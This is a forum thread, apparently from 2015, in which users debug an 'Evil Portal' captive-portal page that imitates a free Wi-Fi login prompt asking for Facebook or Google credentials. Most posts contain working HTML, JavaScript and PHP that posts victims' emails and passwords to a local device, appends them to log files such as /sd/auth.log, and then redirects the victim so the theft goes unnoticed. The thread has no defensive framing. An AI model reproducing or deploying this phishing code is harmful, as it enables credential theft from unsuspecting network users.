THCMinister Posted January 15, 2015 Posted January 15, 2015 (edited) I am unable to get the redirect for evil portal to work. The capture of the variables works but does not redirect to the $authtarget. I have searched the forums and followed the various examples/solutions provided. Below is my function code on the splash.html <script type="text/javascript"> function ajaxRequest() { if (window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (window.ActiveXObject) { return new ActiveXObject("Microsoft.XMLHTTP"); } else { return false; } } function sendInfo() { var xmlhttp = new ajaxRequest(); document.getElementById("results").innerHTML="<p><i>Thank you!</i></p>"; var usernamevalue=encodeURIComponent(document.getElementById("username").value); var passwordvalue=encodeURIComponent(document.getElementById("password").value); var roomnumvalue=encodeURIComponent(document.getElementById("roomnum").value); var lastnamevalue=encodeURIComponent(document.getElementById("lastname").value); var parameters="username="+usernamevalue+"&password="+passwordvalue+"&roomnum="+roomnumvalue+"&lastname="+lastnamevalue; xmlhttp.open("POST", "http://172.16.42.1/capture.php", true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.send(parameters); window.location.assign("$authtarget"); } </script> Here is my form with button <form id="form_1" method="POST" action="http://172.16.42.1/capture.php"> <br> <div class="credential_block block"> <b>Login with one of the following <br><img src="images/smicons.png"><br> <div id="room_number_cred"> <font class="block">Email</font> <input class="txt_field" name="username" id="username" type="text"> </div> <div id="last_name_cred"> <font class="block">Password</font> <input class="txt_field" name="password" id="password" type="password"> </div> <input value="Connect" type="submit" onclick="sendInfo();return false;"> Here is my capture.php <?php $username = $_POST["username"]; $password = $_POST["password"]; $roomnum = $_POST["roomnum"]; $lastname = $_POST["lastname"]; $file = fopen("stored.txt", "a"); fwrite($file, "Username: " . $username . " Password: " . $password . " RoomNumber: " . $roomnum . " Lastname: " . $lastname . "\n"); fclose($file); echo '<p><i>Thank you!</i></p>'; ?> Edited January 15, 2015 by THCMinister Quote
WPA3 Posted January 15, 2015 Posted January 15, 2015 (edited) Im not expert but is this why https://forums.hak5.org/index.php?/topic/33578-evil-portal-setup-adding-the-authtarget-to-a-button/ add a javascript function:redirectToTagert() {window.location = $authtarget;}add the function to the onclick event for your button:<button type="button" onclick="sendInfo();return false;redirectToTarget()">Submit</button>That should work fine Edited January 15, 2015 by z3roc00l Quote
THCMinister Posted January 15, 2015 Author Posted January 15, 2015 (edited) I will try asap and postt the results, I believe I have tried this method. Edited January 18, 2015 by THCMinister Quote
sud0nick Posted January 15, 2015 Posted January 15, 2015 (edited) Why not use jQuery and make this process simpler? You could assign the button to a class then use that to reference it in a javascript function like so: <button class="send_info_button">Submit</button> $('.send_info_button').on("click",function(){ $.post('/path/to/script/', {$dataToSend},function(){ window.location = $authtarget; }); }); If you need help referencing jquery.min.js look at my post in the Evil Portal support thread here: https://forums.hak5.org/index.php?/topic/33554-support-evil-portal/page-2 Edited January 15, 2015 by sud0nick Quote
THCMinister Posted January 15, 2015 Author Posted January 15, 2015 Thanks sud0nick, I think will will readjust my code to use jquery. Quote
THCMinister Posted January 18, 2015 Author Posted January 18, 2015 Why not use jQuery and make this process simpler? You could assign the button to a class then use that to reference it in a javascript function like so: <button class="send_info_button">Submit</button> $('.send_info_button').on("click",function(){ $.post('/path/to/script/', {$dataToSend},function(){ window.location = $authtarget; }); }); If you need help referencing jquery.min.js look at my post in the Evil Portal support thread here: https://forums.hak5.org/index.php?/topic/33554-support-evil-portal/page-2 Here is what I got and it's working! In my splash.html <script src="//172.16.42.1/nodogsplash/jquery.min.js"></script> <script> $(document).ready(function() { $('body').on('click', '.myselector', function(e) { var email_addr = $('#email').val(); var pass = $('#password').val(); if (email_addr == "" || pass == "") { alert("Please login with your Facebook or Google account to access free Wi-Fi."); return; } else { $.ajax({ type: "POST", url: "//172.16.42.1/capture.php", data: {email: email_addr, password: pass}, dataType: 'json', success: function(data, textStatus, jqXHR) { window.location.href="$authtarget"; }, error: function(data, textStatus, errorThrown) { window.location.href="$authtarget"; } }); } }); }); </script> <form id="form_1" method="POST" action="http://172.16.42.1/capture.php"> <table width="959" height="642"> <tr><td colspan="2">Â </td></tr> <tr><td align="right">Email :</td><td><input name="email" id="email" type="text"/></td></tr> <tr><td align="right">Password :</td><td><input name="password" id="password" type="password"/></td></tr> <tr><td colspan="2" align="center"><input value="Login To Connect" class="myselector" type="button"></td></tr> </table> </td> </td> </tr> <tr height="50" valign="bottom"><td colspan="2">Â </td></tr> </table></form> I used sud0nick's auth.php <?php if (isset($_POST['email'])) { $fh = fopen('/sd/auth.log', 'a+'); fwrite($fh, "Email: " . $_POST['email'] . "\n"); fwrite($fh, "Pass: " . $_POST['password'] . "\n\n"); fclose($fh); $referer = $_SERVER['HTTP_REFERER']; header("Location: $authtarget"); } else { header('Location: splash.html'); } ?> Quote
sud0nick Posted January 18, 2015 Posted January 18, 2015 (edited) $.ajax({ type: "POST", url: "//172.16.42.1/capture.php", data: {email: email_addr, password: pass}, dataType: 'json', success: function(data, textStatus, jqXHR) { window.location.href="$authtarget"; }, error: function(data, textStatus, errorThrown) { window.location.href="$authtarget"; } }); You can replace this long AJAX request with a simple $.post() request like in my other comment. It doesn't make any difference I just want you to know the option is available. $.post("//172.16.42.1/nodogsplash/auth.php", {email:email_addr,password:pass},function(){ window.location.href="$authtarget"; }); Also, in regard to your auth.php script I see you have a variable ($referer) that isn't used and you set header("Location: $authtarget"); This never gets used because the only time this block of code is called is when a POST request is sent. When someone accesses the page manually they immediately drop into the else block which sets the location to splash.html. In the JavaScript, upon a successful call to auth.php the block of code that says window.location.href="$authtarget"; will redirect the user to $authtarget. The PHP script will not redirect them to $authtarget. Edited January 18, 2015 by sud0nick Quote
THCMinister Posted January 18, 2015 Author Posted January 18, 2015 You can replace this long AJAX request with a simple $.post() request like in my other comment. It doesn't make any difference I just want you to know the option is available. $.post("//172.16.42.1/nodogsplash/auth.php", {email:email_addr,password:pass},function(){ window.location.href="$authtarget"; }); Also, in regard to your auth.php script I see you have a variable ($referer) that isn't used and you set header("Location: $authtarget"); This never gets used because the only time this block of code is called is when a POST request is sent. When someone accesses the page manually they immediately drop into the else block which sets the location to splash.html. In the JavaScript, upon a successful call to auth.php the block of code that says window.location.href="$authtarget"; will redirect the user to $authtarget. The PHP script will not redirect them to $authtarget. I need to do some code cleanup lol. The redirect/unused variable in the php I accidentally left in during some of the testing I was doing. But thank you for the constructive criticism and assistance. Quote
bikithalee Posted February 28, 2015 Posted February 28, 2015 Try this.....Javascript Redirect Lee Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.